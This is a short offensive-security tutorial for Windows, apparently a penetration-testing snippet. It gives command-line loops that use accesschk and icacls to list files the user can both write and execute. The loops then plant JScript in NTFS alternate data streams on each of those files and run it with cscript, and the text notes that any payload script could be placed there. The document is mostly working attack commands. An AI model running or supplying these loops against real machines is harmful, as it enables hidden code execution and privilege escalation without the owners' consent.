The following loop may be used to find all files that are both executable and writable.
accesschk "username" c:\ -wus | for /f "tokens=1*" %a in ('findstr RW') do (echo %b & icacls "%b" ^| find "RX") >> rx.txt
To increase your chances of finding a file you may actually execute you can run the following loop after. It will try to add an alternative stream to every file identified and then execute it through cscript. Anything that executes will potentially be vulnerable and you could place whatever jscript you want in that alternative stream.
type rx.txt | find "c:\" |for /f "tokens=1 delims=[" %a in ('findstr /v ":("') do call set b=%a & call set c=%b:~0,-2%:test.js& call echo WScript.Echo("Executed %c%");^> "%c%" & call cscript "%c%" >> jsres.txt
type jsres.txt | find "Executed"
You should now get an output consisting of the location of the file that is vulnerable.
In case there are many errors it could be due to trailing white spaces. The loop above tries removing trailing white spaces but since batch is limited in string manipulation, then in case there are more issues with white spaces at the end you may have to remove those with this Powershell command:
Get-Content .\rx.txt | Foreach {$_.TrimEnd()} | Set-Content .\rx.txt
Then you run this simplified loop to find executable alternative streams.
type rx.txt | find "c:\" |for /f "tokens=1 delims=[" %a in ('findstr /v ":("') do echo WScript.Echo("Executed %a:test.js");^> "%a:test.js" & call cscript "%a:test.js" >> jsres2.txt
type jsres2.txt | find "Executed"
You should now get an output consisting of the location of the file that is vulnerable. The output may lack some characters but it should give you an idea of the location of the vulnerable file.